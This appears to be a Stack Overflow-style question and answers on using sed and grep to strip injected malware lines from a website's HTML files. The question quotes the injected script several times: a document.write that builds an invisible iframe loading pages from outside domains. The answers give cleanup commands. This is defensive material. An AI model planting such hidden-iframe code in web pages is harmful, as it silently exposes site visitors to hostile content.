# Cleaning up iframe malware

Tags: linux, sed, malware

I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it.

The strings are:

```js
<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script>

<script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
```

I can't seem to figure out how to escape the various characters in those lines...

If I try to just say delete the entire line if it matches `http://vidintex.com/includes/class.pop.php` it also deletes the closing html `</body>` in the `.html` files as well.

So I need to be able to match this entire line in sed:

```js
    <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script>
```

Any help would be greatly appreciated!

Answer (score 1, accepted):

You can try doing this :

```
sed -i '/vidintex.com\/includes\/class.pop.php/d' files*
```

This will delete all lines containing  vidintex.com/includes/class.pop.php

Comment: Thanks. That is getting me much closer, but it then also removes the closing "</body>" in the file as well. (these strings are at the end of the file)

Answer (score 0):

You may start using SMScanner at sourceforge! It will solve your problems instantly

Answer (score 0):

Similar to [Looking for script to delete iframe malware from linux server](https://stackoverflow.com/questions/16547315/looking-for-script-to-delete-iframe-malware-from-linux-server), you can look for the `script` tag that is placed next to the final `body` tag and replace that with just the `body` tag. This script will find all the affected files and remove the final script.

It has the potential that it might find genuine files with scripts at the end - so first check that the grep for files only finds infected files.

```sh
# grep recursively for text
# escape all spaces in file names
# global search and replace with just body tag
grep -Rl "</script></body>" * | sed 's/ /\ /g' | xargs sed -i 's/<script .*><\/script><\/body>/<\/body>/g'
```